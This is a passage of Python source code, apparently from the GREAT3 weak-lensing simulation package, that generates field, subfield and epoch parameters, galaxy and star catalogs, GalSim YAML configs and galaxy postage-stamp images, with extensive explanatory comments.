n_fields = n_subfields / n_subfields_per_field
# Also check some things about the deep fields. We need to figure out how many to make.
n_deep_subfields = constants.n_deep_subfields
if n_deep_subfields % n_subfields_per_field != 0:
raise RuntimeError("%d deep subfields does not divide evenly into %d fields!" %\
(n_deep_subfields, n_subfields_per_field) )
n_reg_subfields = n_subfields - n_deep_subfields
if constants.deep_frac > float(n_deep_subfields) / n_reg_subfields:
raise RuntimeError("%d subfields is insufficient for %f deep fraction!" % \
(n_deep_subfields, constants.deep_frac) )
n_deep_fields = n_deep_subfields / n_subfields_per_field
n_reg_fields = n_fields - n_deep_fields
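# Worked example with hypothetical numbers (not from the original source): if
# n_subfields = 220, n_deep_subfields = 20, and n_subfields_per_field = 20,
# then n_fields = 11, n_reg_subfields = 200, n_deep_fields = 1, and
# n_reg_fields = 10; the check above then requires deep_frac <= 20/200 = 0.1.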
# A note regarding these deep fields: in most respects they are to be like the regular
# fields. For example, galaxy selection is the same: we only make images of galaxies that
# would be observed at S/N>=20 in the regular fields. PSF and shear determination is
# carried out in the same way. The only difference comes in the noise builder, when
# choosing the level of noise to add (all the way down at the level of epochs). Even then,
# we use the same typical noise variance for all stored quantities - so that galaxy
# selection can use them - and use a multiplicative factor to tell it to add less noise for
# the deep field.
# Put together the basic parameters to be stored in the metaparameters file.
self.parameters = {"metadata": metadata, "seed": seed, "pixel_scale": pixel_scale,
"n_fields": n_fields}
# And use the mapper to write them out.
self.mapper.write(self.parameters, 'parameters', self.parameters)
# Now, initialize a RNG with the required seed. We'll use that to set up seeds for
# everything else that follows.
rng = galsim.UniformDeviate(seed)
# We also have to set up schema for catalogs and such. We'll set up a basic schema here, as
# well as schema to be used for shear-related parameters.
base_schema = [("index", int), ("x", int), ("y", int),
("xshift", float), ("yshift", float),
("xmin", int), ("xmax", int), ("ymin", int), ("ymax", int)]
shear_schema = [("g1", float), ("g2", float), ("mu", float),
("x_field_pos", int), ("y_field_pos", int), ("ID", int)]
seed += 1 # We could also draw random integers to set seeds, but that does not seem necessary.
# Start a separate sequence for noise_seed, which will be used to make the noise fields in
# the images. The offset is an arbitrary constant chosen to be much larger than the
# plausible number of items in the original seed sequence (it is the golden ratio phi * 10^6).
noise_seed = seed + 1618033
# Now we begin to loop over successively smaller units - starting with field, then subfield,
# then epoch. For each of these, we will generate the necessary parameters.
for field_index in xrange(n_fields):
# A given field has the same shear and per-epoch PSF. Thus, we set up the shear and PSF
# parameters at the field level.
#
# The builders can decide what format to use for the results of
# generateFieldParameters(). We don't actually care what that format is out here - we
# will just pass it along to generateSubfieldParameters() or generateEpochParameters(),
# which are other methods of the builders. So we require internal consistency between
# the various generate*Parameters() methods, but we should be able to switch parameter
# selection between the field/subfield/epoch layer without modifying this code, just
# modifying the builders themselves (in psf.py, shear.py, noise.py, or galaxies.py).
field_shear_parameters = self.shear_builder.generateFieldParameters(rng, field_index)
field_psf_parameters = self.psf_builder.generateFieldParameters(rng, field_index)
# Now we set up a `field_parameters` dict which includes the field parameters we just
# generated for the shear and PSF, as well as other basic info like "which field is
# this", the offsets of subfields within the field (see call to
# generateSubfieldOffsets() below), the random seed, and some metadata.
field_parameters = {
"shear": field_shear_parameters,
"psf": field_psf_parameters,
"field_index": field_index,
"subfield_offsets": self.generateSubfieldOffsets(
rng, n_subfields_per_field,
constants.subfield_grid_subsampling),
"metadata": metadata,
"seed": seed,
}
seed += 1
# Use the mapper to write the field parameters to file.
self.mapper.write(field_parameters, 'field_parameters', field_parameters)
# Now loop over subfields within this field.
field_min_subfield = field_index * n_subfields_per_field
field_max_subfield = field_min_subfield + n_subfields_per_field - 1
for subfield_index in xrange(field_min_subfield, field_max_subfield+1):
# A given subfield has the same shear (already determined at field level) and
# galaxies. But to allow for flexibility later on, we'll have a
# generateSubfieldParameters() for the shear builder anyway; it has to take the
# output of generateFieldParameters() as an input. For now, it's a no-op, returning
# the input as output - but that might not be the case later on.
#
# As at the field level, we then collect the subfield parameters (which are the
# field-level shear parameters and the galaxy parameters determined at the subfield
# level), plus some other necessary bits of data.
subfield_parameters = {
"shear": self.shear_builder.generateSubfieldParameters(rng, subfield_index,
field_shear_parameters),
"galaxy": self.galaxy_builder.generateSubfieldParameters(rng, subfield_index),
"subfield_index": subfield_index,
"subfield_offset": \
field_parameters["subfield_offsets"][subfield_index-field_min_subfield],
"field_index": field_index,
"metadata": metadata,
"seed": seed,
}
seed += 1
# Include schema for the subfield-level parameters.
subfield_parameters["subfield_schema"] = \
(base_schema + shear_schema + subfield_parameters["galaxy"]["schema"])
# Use the mapper to write the subfield parameters to file.
self.mapper.write(subfield_parameters, 'subfield_parameters', subfield_parameters)
# Finally, loop over the epoch.
for epoch_index in xrange(self.n_epochs):
# Each epoch has its own PSF (already determined at field level) and noise.
# But the galaxies and shears were determined at the subfield level, so nothing
# new is needed here.
epoch_parameters = dict(subfield_parameters)
epoch_parameters["psf"] = \
self.psf_builder.generateEpochParameters(rng, subfield_index, epoch_index,
field_psf_parameters)
# We also determine noise-related parameters at the epoch level. So, here we
# determine a multiplying factor for the sky variance based on whether we are in
# a deep field or not. Note that changes in the sky variance due to single
# vs. multiepoch images are handled directly in the noise_builder (which knows
# what branch we're in), so they do not need to be included here.
if subfield_index < n_reg_subfields:
noise_mult = 1.
else:
noise_mult = constants.deep_variance_mult
if self.obs_type == "ground" and not self.draw_psf_src:
epoch_parameters["noise"] = \
self.noise_builder.generateEpochParameters(
rng, subfield_index, epoch_index,
field_parameters["psf"]["atmos_psf_fwhm"], noise_mult)
else:
epoch_parameters["noise"] = \
self.noise_builder.generateEpochParameters(rng, subfield_index,
epoch_index, None,
noise_mult)
epoch_parameters["epoch_index"] = epoch_index
epoch_parameters["subfield_index"] = subfield_index
epoch_parameters["field_index"] = field_index
epoch_parameters["seed"] = seed
seed += 1
epoch_parameters["noise_seed"] = noise_seed
noise_seed += constants.nrows * constants.ncols
epoch_parameters["epoch_schema"] = (epoch_parameters["subfield_schema"]
+ epoch_parameters["psf"]["schema"])
epoch_parameters["star_schema"] = \
base_schema + epoch_parameters["psf"]["schema"]
# `xdither`, `ydither` are the amount of dithering between epochs of this
# subfield. In contrast, `epoch_offset` (a tuple) is the amount of offsetting
# between this subfield and the first one in the field, i.e., it's the same as
# `subfield_offset`. This is not truly a per-epoch parameter; however, it is
# included here so that the per-epoch catalog maker (specifically, for PSFs)
# will be able to do its job.
if self.multiepoch:
epoch_parameters["xdither"] = (2.0 * rng() - 1.0) * \
constants.epoch_shift_max
epoch_parameters["ydither"] = (2.0 * rng() - 1.0) * \
constants.epoch_shift_max
else:
epoch_parameters["xdither"] = 0.0
epoch_parameters["ydither"] = 0.0
epoch_parameters["epoch_offset"] = subfield_parameters["subfield_offset"]
self.mapper.write(epoch_parameters, 'epoch_parameters', epoch_parameters)
return seed
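# Illustrative driver sketch (hypothetical; the real pipeline entry point lives
# elsewhere in the great3sims package): the returned value is the next unused
# seed, so successive calls continue the same deterministic sequence.
#
#     seed = 12345
#     seed = builder.writeParameters(seed)
#     for subfield_index in xrange(n_subfields):
#         builder.writeSubfieldCatalog(subfield_index)
#         for epoch_index in xrange(builder.n_epochs):
#             builder.writeEpochCatalog(subfield_index, epoch_index)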
def writeSubfieldCatalog(self, subfield_index):
"""Given the subfield index, load the corresponding metaparameters (previously generated by
writeParameters()), and use them to generate a catalog of galaxies and shear values.
"""
# Read the subfield and field parameters.
subfield_parameters = self.mapper.read("subfield_parameters", subfield_index=subfield_index)
field_parameters = self.mapper.read(
"field_parameters",
field_index = ( subfield_index /
constants.n_subfields_per_field[self.shear_type][self.variable_psf] )
)
# Set up a catalog with the appropriate schema.
catalog = numpy.zeros(constants.nrows * constants.ncols,
dtype=numpy.dtype(subfield_parameters["subfield_schema"]))
index = 0
# Use the given seed to initialize a RNG.
rng = galsim.UniformDeviate(subfield_parameters["seed"])
# Loop over the galaxies and generate some basic numbers like where they belong in the image
# corresponding to this subfield, what is their centroid shift compared to the nominal
# position, etc.
for row in xrange(constants.nrows):
for col in xrange(constants.ncols):
# The numbers below are all in pixels.
sx = (2.0*rng() - 1.0) * constants.centroid_shift_max
sy = (2.0*rng() - 1.0) * constants.centroid_shift_max
record = catalog[index]
record['index'] = index
record['xmin'] = col * constants.xsize[self.obs_type][self.multiepoch]
record['ymin'] = row * constants.ysize[self.obs_type][self.multiepoch]
record['xmax'] = (col + 1) * constants.xsize[self.obs_type][self.multiepoch] - 1
record['ymax'] = (row + 1) * constants.ysize[self.obs_type][self.multiepoch] - 1
record['x'] = (record['xmin'] + record['xmax']) / 2
record['y'] = (record['ymin'] + record['ymax']) / 2
record['xshift'] = sx
record['yshift'] = sy
index += 1
# Determine multiplying factor for the sky variance based on whether we are in a deep field
# or not. Note that sky variance changes due to single vs. multiepoch images are not
# included at this stage, because we want to impose our cuts based on whether the S/N would
# be 20 in a single combined image, not based on its value in the individual epoch images.
# Also note that while the noise variance parameter output into the epoch_parameters files
# by the noise builder already includes this noise_mult for the deep fields (and any factors
# due to single vs. multiepoch which we do *not* want here), we have to recalculate the deep
# field noise multiplying factor because we're just going to use the
# noise_builder.typical_variance which does not include any of those factors.
if subfield_index < constants.n_subfields - constants.n_deep_subfields:
noise_mult = 1.
else:
noise_mult = constants.deep_variance_mult
# We give the galaxy catalog generation routine a value for seeing to use when selecting
# galaxies. This calculation becomes more complex in the multi-epoch case since we have to
# decide on a relevant effective FWHM.
effective_seeing = None
if self.obs_type != "space":
# Note: really we care about the full PSF FWHM, not just the atmospheric part. However,
# we use the seeing as a proxy for it, so we don't have to start generating images. If
# this seems really worrisome, we could make some simple sims, derive approximate rules
# for total PSF size including optics as well (which will mainly affect really
# good-seeing images), and use those instead of just the atmospheric seeing.
if not self.draw_psf_src:
if not self.multiepoch and not self.variable_psf:
# For single epoch images with a constant PSF, the FWHM is just a single (scalar)
# value for the entire subfield.
effective_seeing = field_parameters["psf"]["atmos_psf_fwhm"]
else:
# This is a 1d numpy array of FWHM values. We reduce it to a single effective
# seeing value via the harmonic mean, 1 / <1/FWHM>, which weights the
# better-seeing epochs more heavily.
seeing = field_parameters["psf"]["atmos_psf_fwhm"]
effective_seeing = 1. / numpy.mean(1./seeing)
# The galaxy builder generates a catalog given some noise variance information (which
# determines galaxy S/N), and the effective seeing (for selecting galaxies that are
# resolved).
self.galaxy_builder.generateCatalog(rng, catalog, subfield_parameters,
self.noise_builder.typical_variance, noise_mult,
effective_seeing)
# The shear builder generates shear values for the catalog.
self.shear_builder.generateCatalog(rng, catalog, subfield_parameters["shear"],
subfield_parameters["subfield_offset"], subfield_index)
# The mapper writes out the galaxy catalog for this subfield in the appropriate directory
# and file.
self.mapper.write(catalog, "subfield_catalog", subfield_parameters)
def writeEpochCatalog(self, subfield_index, epoch_index):
"""Given the subfield and epoch indices, load the epoch metaparameters and a
previously-generated subfield catalog. Then, add per-object PSF parameter information (and
possibly shift the centroids) to create and save an epoch catalog.
"""
# First, read in the stored parameter information and subfield catalog.
epoch_parameters = self.mapper.read('epoch_parameters', subfield_index=subfield_index,
epoch_index=epoch_index)
subfield_catalog = self.mapper.read('subfield_catalog', epoch_parameters)
# Make a catalog for this epoch, according to the stored schema.
epoch_catalog = numpy.zeros(constants.nrows * constants.ncols,
dtype=numpy.dtype(epoch_parameters["epoch_schema"]))
# Initialize a RNG with the given seed.
rng = galsim.UniformDeviate(epoch_parameters["seed"])
# First, just carry over values from the subfield catalog into the epoch catalog.
for name, _ in epoch_parameters["subfield_schema"]:
epoch_catalog[name] = subfield_catalog[name]
# Then, generate the PSF information for the catalog, given the parameters for this epoch.
self.psf_builder.generateCatalog(rng, epoch_catalog, epoch_parameters,
epoch_parameters["epoch_offset"], normalized=True)
# Write out the epoch-level catalog for the galaxies.
self.mapper.write(epoch_catalog, "epoch_catalog", epoch_parameters)
# We also need a star catalog for this epoch. To set up the positions in the catalog,
# figure out the size that each star postage stamp will cover. (These should be the same as
# the sizes covered by galaxy postage stamps.)
xsize = constants.xsize[self.obs_type][self.multiepoch]
ysize = constants.ysize[self.obs_type][self.multiepoch]
# Then write star catalog entries, which depends on whether this is a variable PSF branch or
# not.
if self.variable_psf:
# We have to write catalog entries indicating the "true" star position within the
# **field** (not subfield). We also have to write x, y entries that are used to place
# the objects on an image grid, the parameters of which are to be defined here.
#
# Finally, let's define a galsim.DistDeviate to use to draw random values of S/N for
# each star. The distribution of S/N values comes from a catalog of main sequence stars
# for galactic longitude=180 degrees, in the I band, from the LSST ImSim. Reading
# numbers off a plot from Chihway Chang and assuming that the S/N of an I=25 star is 25,
# the function we get is
# dN/d(S/N) ~ (mag - 18) / S/N
# ~ (-2.5 log10(S/N) + 10.5) / S/N.
# We assume that the distribution of star S/N values can go from 25 to 400, with higher
# S/N stars being excluded due to saturation.
dist_deviate = galsim.DistDeviate(
rng,
function = lambda x : (-2.5*numpy.log10(x)+10.5)/x, x_min=25., x_max=400.)
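# Illustrative aside (not from the original source): galsim.DistDeviate builds
# a cumulative distribution from the supplied (unnormalized) density on
# [x_min, x_max] and inverts it, so each call returns one S/N sample, e.g.:
#
#     snr_samples = [dist_deviate() for _ in xrange(10)]   # values in [25, 400]
#
# The explicit loop below draws the equivalent, one star at a time.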
# First, determine how many stars should be in this subfield, which will determine the
# size of the catalog to write. Note that this is for a single subfield, which means
# the number of stars should be 1/20 of those for the entire field.
n_star_linear = epoch_parameters["psf"]["n_star_linear"]
star_catalog = numpy.zeros(n_star_linear * n_star_linear,
dtype=numpy.dtype(epoch_parameters["star_schema"]))
index = 0
# Loop over the entries in the star catalog.
for row in xrange(n_star_linear):
for col in xrange(n_star_linear):
# The numbers below are in pixels, and are used to define image positions.
sx = (2.0*rng() - 1.0) * constants.centroid_shift_max
sy = (2.0*rng() - 1.0) * constants.centroid_shift_max
record = star_catalog[index]
record['index'] = index
record['xmin'] = col * constants.xsize[self.obs_type][self.multiepoch]
record['ymin'] = row * constants.ysize[self.obs_type][self.multiepoch]
record['xmax'] = (col + 1) * constants.xsize[self.obs_type][self.multiepoch] - 1
record['ymax'] = (row + 1) * constants.ysize[self.obs_type][self.multiepoch] - 1
record['x'] = (record['xmin'] + record['xmax']) / 2
record['y'] = (record['ymin'] + record['ymax']) / 2
# Here are some numbers that we'll only compute if it's the first epoch. Since
# we want to represent the same star population in each epoch, we store them in
# the cache after generating the first epoch, and read from the cache if it's
# not the first epoch.
if epoch_index == 0:
record['xshift'] = sx
record['yshift'] = sy
# But these numbers are the true positions within the field.
record['x_field_true_deg'] = constants.image_size_deg * rng()
record['y_field_true_deg'] = constants.image_size_deg * rng()
# Finally, let's make a S/N value for this star (per epoch). In other
# words, the star would have S/N=record['star_snr'] in a single-epoch
# branch, or in each of the images in a multi-epoch branch. This differs
# from our handling of galaxies, where the flux is split up among the
# different epochs. The rationale (possibly weak?) is this: most people
# will choose some range of stars to use for PSF estimation, and put that
# selection into their star-finder before estimating PSF. That means that
# if they have one long exposure vs. a few shorter ones, and they have to
# estimate the PSF per exposure, they would legitimately select different
# sets of stars in the two cases. (e.g., in the one long exposure, some
# stars might be saturated and unusable, whereas for fewer short exposures,
# they could be used.) We are glossing over the slight difference in star
# number density that should also occur, and just using the fact that the
# S/N distribution should be similar.
record['star_snr'] = dist_deviate()
index += 1
if epoch_index == 0:
self.cached_xshift = star_catalog['xshift']
self.cached_yshift = star_catalog['yshift']
self.cached_x_field_true_deg = star_catalog['x_field_true_deg']
self.cached_y_field_true_deg = star_catalog['y_field_true_deg']
self.cached_star_snr = star_catalog['star_snr']
else:
star_catalog['xshift'] = self.cached_xshift
star_catalog['yshift'] = self.cached_yshift
star_catalog['x_field_true_deg'] = self.cached_x_field_true_deg
star_catalog['y_field_true_deg'] = self.cached_y_field_true_deg
star_catalog['star_snr'] = self.cached_star_snr
else:
# For constant PSF branches, the star catalog generation is much simpler.
star_catalog = numpy.zeros(constants.nx_constpsf * constants.ny_constpsf,
dtype=numpy.dtype(epoch_parameters["star_schema"]))
index = 0
for yc in xrange(constants.ny_constpsf):
for xc in xrange(constants.nx_constpsf):
# The numbers below are in pixel units.
record = star_catalog[index]
record["xmin"] = xc * xsize
record["ymin"] = yc * ysize
record["xmax"] = (xc + 1) * xsize - 1
record["ymax"] = (yc + 1) * ysize - 1
record["index"] = index
record["x"] = (record["xmin"] + record["xmax"]) / 2
record["y"] = (record["ymin"] + record["ymax"]) / 2
# Here are some numbers that we will save in a cache, only computing for the
# first epoch in a field, so as to preserve the random subpixel shifts between
# stars in the starfield. This way simple coaddition will work for all stars in
# one of the constant PSF starfields.
if epoch_index == 0:
if index > 0:
sx = (2.0*rng() - 1.0) * constants.centroid_shift_max
sy = (2.0*rng() - 1.0) * constants.centroid_shift_max
record["xshift"] = sx
record["yshift"] = sy
else:
record["xshift"] = 0
record["yshift"] = 0
index += 1
if epoch_index == 0:
self.cached_xshift = star_catalog['xshift']
self.cached_yshift = star_catalog['yshift']
else:
star_catalog['xshift'] = self.cached_xshift
star_catalog['yshift'] = self.cached_yshift
# Given the basic catalog information generated above, make the catalog of PSF parameters
# (e.g., optical PSF and atmospheric PSF parameters) for each star.
self.psf_builder.generateCatalog(rng, star_catalog, epoch_parameters,
epoch_parameters["epoch_offset"], normalized=False)
# Write the star catalog to file in the appropriate location and format.
self.mapper.write(star_catalog, "star_catalog", epoch_parameters)
def writeStarTestCatalog(self, subfield_min, subfield_max):
"""Given a range of subfield and epoch indices, write a test catalog for generating star
images to check for oddities. We want a small set of objects (suitable for eyeballing)
chosen in a representative way."""
n_subfields = subfield_max + 1 - subfield_min
# Define a final catalog with some additional information about subfield / epoch. That
# way if we find a problematic star image in the data cube, we know where it came from.
epoch_parameters = self.mapper.read('epoch_parameters', subfield_index=subfield_min,
epoch_index=0)
test_schema = epoch_parameters["star_schema"]
test_schema.append(("subfield", int))
test_schema.append(("epoch", int))
test_schema.append(("star_catalog_entry", int))
test_catalog = numpy.zeros(n_subfields * self.n_epochs, dtype=numpy.dtype(test_schema))
# Now loop over subfields and epochs.
test_ind = 0
for subfield_index in xrange(subfield_min, subfield_max+1):
for epoch_index in xrange(self.n_epochs):
# Read in the epoch parameters and star catalog.
epoch_parameters = self.mapper.read('epoch_parameters',
subfield_index=subfield_index,
epoch_index=epoch_index)
star_catalog = self.mapper.read("star_catalog", epoch_parameters)
# What we do with the catalog depends on whether it's a constant or variable PSF
# branch. We have to choose which star in the catalog we want to use differently in
# these cases.
if not self.variable_psf:
# For constant PSF, just transfer the first entry (i.e., the non-offset one) to
# the test catalog.
star_cat_ind = 0
else:
# For variable PSF, find the index of the most aberrated PSF in the catalog. In
# general, more aberrated PSFs are the ones that might have the most numerical
# difficulties in the rendering process.
tot_aber = numpy.zeros(len(star_catalog))
for aber in self.psf_builder.use_aber:
tot_aber += star_catalog[self.psf_builder.opt_schema_pref+aber]**2
star_cat_ind = numpy.argmax(tot_aber)
# We cannot just do
# test_catalog[test_ind] = star_catalog[0]
# because the schema are not identical. Instead we loop over the schema entries for
# star_catalog, and transfer the information for each one over to test_catalog.
for schema_entry in epoch_parameters["star_schema"]:
test_catalog[schema_entry[0]][test_ind] = \
star_catalog[schema_entry[0]][star_cat_ind]
test_catalog["subfield"][test_ind] = subfield_index
test_catalog["epoch"][test_ind] = epoch_index
test_catalog["star_catalog_entry"][test_ind] = star_cat_ind
test_ind += 1
# Write to the appropriate file and directory as specified by the mapper.
self.mapper.write(test_catalog, "star_test_catalog", epoch_parameters)
def writeConfig(self, experiment, obs_type, shear_type, subfield_min, subfield_max):
"""This function writes yaml-style config files that can be used by GalSim to automatically
generate the galaxy, star, and test images for this branch and range of subfields."""
# Build the dictionary, which we'll output with yaml.dump()
# We start with the PSF dict, which has much in common with the gal dict.
# After we write that out, we'll change what has to change and add the gal field.
d = {}
# We'll use this same format_items several times below:
format_items = [
{ 'type' : 'Sequence',
'first' : subfield_min, 'last' : subfield_max,
'repeat' : self.n_epochs
},
{ 'type' : 'Sequence', 'nitems' : self.n_epochs }
]
#
# (1) First make the config files that will create the PSF images.
#
# The input field:
d['input'] = {
'catalog' : {
'file_name' : {
'type' : 'FormattedStr',
'format' : 'star_catalog-%03d-%1d.fits',
'items' : format_items
},
'dir' : self.mapper.dir
},
'dict' : {
'file_name' : {
'type' : 'FormattedStr',
'format' : 'epoch_parameters-%03d-%1d.yaml',
'items' : format_items
},
'dir' : self.mapper.dir
}
}
# The output field:
d['output'] = {
'type' : 'Fits',
'file_name' : {
'type' : 'FormattedStr',
'format' : 'starfield_image-%03d-%1d.fits',
'items' : format_items
},
'dir' : self.mapper.dir,
'nfiles' : self.n_epochs*(subfield_max - subfield_min + 1),
'noclobber' : True,
}
# The image field:
if self.variable_psf:
nx = {'type' : 'Dict', 'key' : 'psf.n_star_linear'}
ny = {'type' : 'Dict', 'key' : 'psf.n_star_linear'}
else:
nx = constants.nx_constpsf
ny = constants.ny_constpsf
d['image'] = {
'type' : 'Tiled',
'nx_tiles' : nx,
'ny_tiles' : ny,
'stamp_xsize' : constants.xsize[self.obs_type][self.multiepoch],
'stamp_ysize' : constants.ysize[self.obs_type][self.multiepoch],
'offset' : {
'type' : 'XY',
'x' : {'type' : 'Catalog', 'col' : 'xshift' },
'y' : {'type' : 'Catalog', 'col' : 'yshift' },
},
'pixel_scale' : constants.pixel_scale[self.obs_type][self.multiepoch],
'random_seed' : {
'type' : 'Sequence',
'first' : { 'type' : 'Dict', 'key' : 'noise_seed' },
'nitems' : {
'type' : 'Eval',
'str' : 'nx*ny',
'inx' : { 'type' : 'Current', 'key' : 'image.nx_tiles' },
'iny' : { 'type' : 'Current', 'key' : 'image.ny_tiles' }
}
},
'index_convention' : 'python',
}
if self.variable_psf:
# The variable psf images are rather large, so parallelize at the image level.
d['image']['nproc'] = self.nproc
else:
# The constant psf images are small enough that it is probably better to
# parallelize at the file level.
d['output']['nproc'] = self.nproc
# Delegate the basic 'psf' dict to psf_builder
d['psf'] = self.psf_builder.makeConfigDict()
if self.variable_psf:
d['psf']['signal_to_noise'] = { 'type' : 'Catalog', 'col' : 'star_snr' }
d['image']['noise'] = {
'type' : 'Gaussian',
'variance' : { 'type' : 'Dict', 'key' : 'noise.variance' }
}
# Set up the file name for the yaml config file:
experiment_letter = experiment[0]
obs_letter = obs_type[0]
shear_letter = shear_type[0]
file_name = os.path.join(self.mapper.root,
experiment_letter + obs_letter + shear_letter + '_psf.yaml')
print 'Write PSF config dict to', file_name
import yaml
# This workaround makes sure we avoid anchors and aliases, since they make it a bit
# less readable. (The default likes to alias the format_items variable I used above.)
# c.f. http://pyyaml.org/ticket/91
Dumper = yaml.SafeDumper
Dumper.ignore_aliases = lambda self, data: True
with open(file_name,'w') as f:
yaml.dump(d, f, indent=4, Dumper=Dumper)
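# Illustrative aside (not from the original source): PyYAML's default dumper
# notices that the same format_items object appears in several places and
# emits an anchor on first use and aliases thereafter, roughly:
#
#     items: &id001 [...]
#     ...
#     items: *id001
#
# Forcing ignore_aliases to always return True makes the dumper inline a full
# copy at every reference instead, which is easier to read at the cost of a
# slightly larger file.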
#
# (2) Make config files for the galaxy images
#
# Start with the above dict and make appropriate changes as necessary.
if self.variable_psf:
del d['psf']['signal_to_noise']
else:
d['image']['noise'] = {
'type' : 'Gaussian',
'variance' : { 'type' : 'Dict', 'key' : 'noise.variance' }
}
d['input']['catalog']['file_name']['format'] = 'epoch_catalog-%03d-%1d.fits'
d['output']['file_name']['format'] = 'image-%03d-%1d.fits'
nx = constants.ncols
ny = constants.nrows
d['image']['nx_tiles'] = nx
d['image']['ny_tiles'] = ny
d['image']['random_seed']['nitems'] = nx*ny
d['image']['offset'] = {
'type' : 'XY',
'x' : { 'type' : 'Eval',
'str' : 'xdither + xshift',
'fxdither' : { 'type' : 'Dict', 'key' : 'xdither' },
'fxshift' : { 'type' : 'Catalog', 'col' : 'xshift' }
},
'y' : { 'type' : 'Eval',
'str' : 'ydither + yshift',
'fydither' : { 'type' : 'Dict', 'key' : 'ydither' },
'fyshift' : { 'type' : 'Catalog', 'col' : 'yshift' }
}
}
d['image']['gsparams'] = { 'maximum_fft_size' : 10240 }
# Delegate the basic 'gal' dict to galaxy_builder
d['gal'] = self.galaxy_builder.makeConfigDict()
# Modifications to gal dict:
d['gal']['shear'] = {
'type' : 'G1G2',
'g1' : { 'type' : 'Catalog', 'col' : 'g1' },
'g2' : { 'type' : 'Catalog', 'col' : 'g2' }
}
d['gal']['magnification'] = { 'type' : 'Catalog', 'col' : 'mu' }
if not self.variable_psf:
# The galaxy images are large, so parallelize at the image level (unlike for the small
# star fields for constant PSF, for which we already had set up to parallelize at the
# file level).
d['image']['nproc'] = self.nproc
del d['output']['nproc']
if self.real_galaxy:
# Need to add the RealGalaxyCatalog to input.
d['input']['real_catalog'] = {
'dir' : os.path.abspath(self.galaxy_builder.gal_dir),
'file_name' : self.galaxy_builder.rgc_file,
'preload' : self.preload
}
file_name = os.path.join(self.mapper.root,
experiment_letter + obs_letter + shear_letter + '.yaml')
print 'Write gal config dict to', file_name
with open(file_name,'w') as f:
yaml.dump(d, f, indent=4, Dumper=Dumper)
#
# (3) Finally, make a config file for the "StarTest" images.
#
# Easiest to just start over here.
d = {}
# The input field:
d['input'] = {
'catalog' : {
'file_name' : 'star_test_catalog.fits',
'dir' : self.mapper.dir
},
}
# The output field:
d['output'] = {
'type' : 'DataCube',
'file_name' : 'star_test_images.fits',
'dir' : self.mapper.dir,
'nimages' : self.n_epochs*(subfield_max - subfield_min + 1),
# The star_test images are all small, so parallelize at the file level.
'nproc' : self.nproc,
'noclobber' : True
}
# The image field:
d['image'] = {
# Make them 2x the normal size.
'xsize' : 2 * constants.xsize[self.obs_type][self.multiepoch],
'ysize' : 2 * constants.ysize[self.obs_type][self.multiepoch],
'pixel_scale' : constants.pixel_scale[self.obs_type][self.multiepoch],
}
# Delegate the basic 'psf' dict to psf_builder
d['psf'] = self.psf_builder.makeConfigDict(use_zero_index=False)
# Set up the file name for the yaml config file:
experiment_letter = experiment[0]
obs_letter = obs_type[0]
shear_letter = shear_type[0]
file_name = os.path.join(self.mapper.root,
experiment_letter + obs_letter + shear_letter + '_star_test.yaml')
print 'Write star test config dict to', file_name
with open(file_name,'w') as f:
yaml.dump(d, f, indent=4, Dumper=Dumper)
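# Illustrative usage note (not from the original source): each generated yaml
# file is a standard GalSim config, so the images can be built from the command
# line with the galsim executable, e.g. for a control/ground/constant branch:
#
#     galsim cgc_psf.yaml
#     galsim cgc.yaml
#     galsim cgc_star_test.yaml
#
# where the 'cgc' prefix follows the experiment/obs_type/shear_type
# first-letter naming convention used above.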
def writeGalImage(self, subfield_index, epoch_index):
"""This method builds and writes the galaxy images for a given subfield and epoch to disk.
It was not used for generation of the GREAT3 simulations, since the GalSim config interface
allows the work done here to be parallelized much more effectively. However, for testing and
generation of small images this method can be useful.
"""
# Read in the epoch parameters and catalog.
epoch_parameters = self.mapper.read("epoch_parameters", subfield_index=subfield_index,
epoch_index=epoch_index)
epoch_catalog = self.mapper.read("epoch_catalog", epoch_parameters)
seed = epoch_parameters["noise_seed"]
# Define basic numbers like pixel scale and size of postage stamps.
pixel_scale = constants.pixel_scale[self.obs_type][self.multiepoch]
xsize = constants.xsize[self.obs_type][self.multiepoch]
ysize = constants.ysize[self.obs_type][self.multiepoch]
# Set up the full image on which to place the postage stamps.
galaxy_image = galsim.ImageF(constants.ncols * xsize, constants.nrows * ysize,
scale=pixel_scale)
galaxy_image.setOrigin(0,0)
# Define the maximum sizes for padding RealGalaxy objects with noise. This is necessary for
# 'real_galaxy' and 'full' branches.
max_xsize = xsize + 2*(constants.centroid_shift_max + constants.epoch_shift_max)
max_ysize = ysize + 2*(constants.centroid_shift_max + constants.epoch_shift_max)
# The GSObjects that are returned by the builders have scale sizes in arcsec, so our
# galsim.Pixel needs to use arcsec as well. However, some of the later manipulations
# (shifts of the centroid within the image carried out by the draw() function) will be in
# pixels.
pixel = galsim.Pixel(pixel_scale)
# We sometimes need a larger FFT than allowed by the default GSParams, so define a new
# GSParams that will allow the larger FFT.
params = galsim.GSParams(maximum_fft_size=10240)
# We'll make a cache for the PSF object, since in constant PSF branches the PSF is the same
# for all galaxies. This way, we only build the PSF object once.
cached_psf_obj = None
# Loop over the objects in the galaxy catalog for this epoch.
for record in epoch_catalog:
# Make the RNG.
rng = galsim.UniformDeviate(seed)
seed = seed + 1
# Build PSF (or take cached value if possible). If we have to build the PSF for the
# constant PSF branch, then save it to the cache.
if not self.variable_psf:
if cached_psf_obj is None:
psf = self.psf_builder.makeGalSimObject(record, epoch_parameters["psf"])
cached_psf_obj = psf
else:
psf = cached_psf_obj
else:
psf = self.psf_builder.makeGalSimObject(record, epoch_parameters["psf"])
# Build galaxy, apply the lensing shear and magnification, and convolve with the PSF.
galaxy = self.galaxy_builder.makeGalSimObject(
record, epoch_parameters["galaxy"], xsize=max_xsize, ysize=max_ysize, rng=rng)
galaxy.applyLensing(g1=record['g1'], g2=record['g2'], mu=record['mu'])
final = galsim.Convolve([psf, pixel, galaxy], gsparams=params)
# Apply both offsets: the one related to dithering between epochs (same for all objects
# in a given epoch), and the random shift of this particular object from the center of
# the postage stamp.
offset = galsim.PositionD(epoch_parameters['xdither'] + record['xshift'],
epoch_parameters['ydither'] + record['yshift'])
# Define postage stamp.
bbox = galsim.BoundsI(
xmin=int(record['xmin']), ymin=int(record['ymin']),
xmax=int(record['xmax']), ymax=int(record['ymax']),
)
stamp = galaxy_image.subImage(bbox)
# Draw into the postage stamp.
final.draw(stamp, normalization='f', dx=pixel_scale, offset=offset)
# Apply whitening if necessary (i.e., for 'real_galaxy' and 'full' branches, which use
# real HST images).
if hasattr(final, 'noise'):
current_var = final.noise.applyWhiteningTo(stamp)
else:
current_var = 0.
# The lines below are diagnostics that can be used to check that the actual S/N is
